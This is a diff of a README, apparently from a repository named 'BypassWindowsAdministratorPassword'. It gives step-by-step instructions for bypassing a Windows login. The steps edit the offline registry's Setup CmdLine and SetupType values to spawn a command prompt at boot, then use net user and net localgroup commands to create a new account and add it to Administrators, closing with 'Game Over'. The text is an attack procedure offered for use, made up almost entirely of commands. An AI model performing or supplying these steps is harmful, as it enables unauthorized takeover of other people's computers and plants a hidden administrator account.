HackerajOfficial/BypassWindowsAdministratorPassword/README.md

 - Open `HKEY_LOCAL_MACHINE
 - Go To Key Name `Hackeraj` -> Go To `Setup`
 - Click on `CmdLine` and Put `cmd.exe` in the Value Data
-- Click on `SetupType` and Put `1` in the Value Data
+- Click on `SetupType` and Put `1` or `2` in the Value Data
 - Click on `Hackeraj`
 - Go To File & Click on Unload Hive
 - Exit / Restart
 - Infront of You Command Prompt.
+So, First see users Type `net user`
-Type net user username password e.g `net user hackeraj *` or `control userpasswords2`
+- Then we need to create a account Type net user username password e.g `net user Hackeraj 12345 /add` or `control userpasswords2`
+- Then need to give Administrator Access this local account `Hackeraj` e.g `net localgroup Administrators Hackeraj /add`
 - Game Over

 ### Tested on